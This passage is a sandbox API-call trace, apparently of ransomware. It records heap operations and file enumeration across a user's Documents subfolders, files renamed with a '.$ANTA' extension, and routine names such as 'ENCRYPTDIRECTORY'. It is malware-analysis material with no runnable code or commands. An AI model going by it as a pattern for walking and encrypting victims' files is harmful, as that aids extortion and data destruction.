lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0083.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0083.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0083.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb240 [0083.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb378 [0083.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0083.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0083.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0083.463] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.463] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0083.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0083.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0083.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.463] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd788582, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfd788582, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfd86d18e, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x17000, dwReserved0=0x144e828, dwReserved1=0x8, cFileName="HUjUtG60c TddWcmy.rtf.$ANTA", cAlternateFileName="HUJUTG~1.$AN")) returned 1 [0083.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0083.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0083.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0083.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0083.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0083.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0083.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0083.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0083.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0083.464] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0083.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0083.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0083.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.464] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0083.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0083.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0083.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0083.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0083.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0083.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0083.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0083.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0083.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0083.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb2b8 [0083.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb0c0 [0083.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0083.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0083.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0083.465] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.465] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0083.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0083.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0083.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.465] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd99e493, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfd99e493, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfda10ce7, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x10d80, dwReserved0=0x144e828, dwReserved1=0x8, cFileName="kDeOPhXR4D.csv.$ANTA", cAlternateFileName="KDEOPH~1.$AN")) returned 1 [0083.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0083.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0083.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0083.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0083.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0083.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0083.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0083.466] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0083.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0083.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0083.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.466] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0083.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0083.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0083.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0083.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0083.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0083.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0083.467] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.467] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.467] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdb41f2b, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfdb41f2b, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfdb8e38a, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x14a90, dwReserved0=0x144e828, dwReserved1=0x8, cFileName="ul2gt2Lt.xlsx.$ANTA", cAlternateFileName="UL2GT2~1.$AN")) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0083.467] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.467] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0083.468] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.468] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.468] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdce58ed, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfdce58ed, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfddca6ae, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0xb870, dwReserved0=0x144e828, dwReserved1=0x8, cFileName="zSm3MoFqp.odp.$ANTA", cAlternateFileName="ZSM3MO~1.$AN")) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0083.468] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.468] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0083.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0083.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0083.469] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0083.469] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0083.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0083.469] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144e330 | out: lpFindFileData=0x144e330*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2be0, ftCreationTime.dwHighDateTime=0x144e690, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2be0, ftLastWriteTime.dwLowDateTime=0x43e9a40, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144e828, dwReserved1=0x8, cFileName="", cAlternateFileName="0нńဓ+\x10")) returned 0 [0083.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0083.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0083.472] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0083.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0083.472] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0083.472] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0083.472] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Music\\" (normalized: "c:\\users\\fd1hvy\\documents\\my music")) returned 0x2416 [0083.473] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Music\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x436859c, ftCreationTime.dwHighDateTime=0x4368594, ftLastAccessTime.dwLowDateTime=0xdf0cc8, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x144eaa0, nFileSizeHigh=0x779b2eea, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x43ca5b0, cFileName="", cAlternateFileName="縷мńဓ+\x10")) returned 0xffffffff [0083.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0083.473] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0083.473] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Music\\" (normalized: "c:\\users\\fd1hvy\\documents\\my music")) returned 0x2416 [0083.473] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Music\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x436859c, ftCreationTime.dwHighDateTime=0x4368594, ftLastAccessTime.dwLowDateTime=0xdf0cc8, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x144eaa0, nFileSizeHigh=0x779b2eea, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x43ca4a8, cFileName="", cAlternateFileName="ﴐмńဓ+\x10")) returned 0xffffffff [0083.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0083.473] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0083.473] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0083.474] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Pictures\\" (normalized: "c:\\users\\fd1hvy\\documents\\my pictures")) returned 0x2416 [0083.474] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Pictures\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x436859c, ftCreationTime.dwHighDateTime=0x4368594, ftLastAccessTime.dwLowDateTime=0xdf0cc8, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x144eaa0, nFileSizeHigh=0x779b2eea, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x43ca670, cFileName="", cAlternateFileName="兩мńဓ+\x10")) returned 0xffffffff [0083.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0083.555] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0083.555] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Pictures\\" (normalized: "c:\\users\\fd1hvy\\documents\\my pictures")) returned 0x2416 [0083.555] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Pictures\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x436859c, ftCreationTime.dwHighDateTime=0x4368594, ftLastAccessTime.dwLowDateTime=0xdf0cc8, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x144eaa0, nFileSizeHigh=0x779b2eea, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x43ca700, cFileName="", cAlternateFileName="豈мńဓ+\x10")) returned 0xffffffff [0083.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0083.555] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0083.555] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0083.555] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes")) returned 0x14 [0083.610] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca730, cFileName=".", cAlternateFileName="")) returned 0x41abfc0 [0083.610] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, 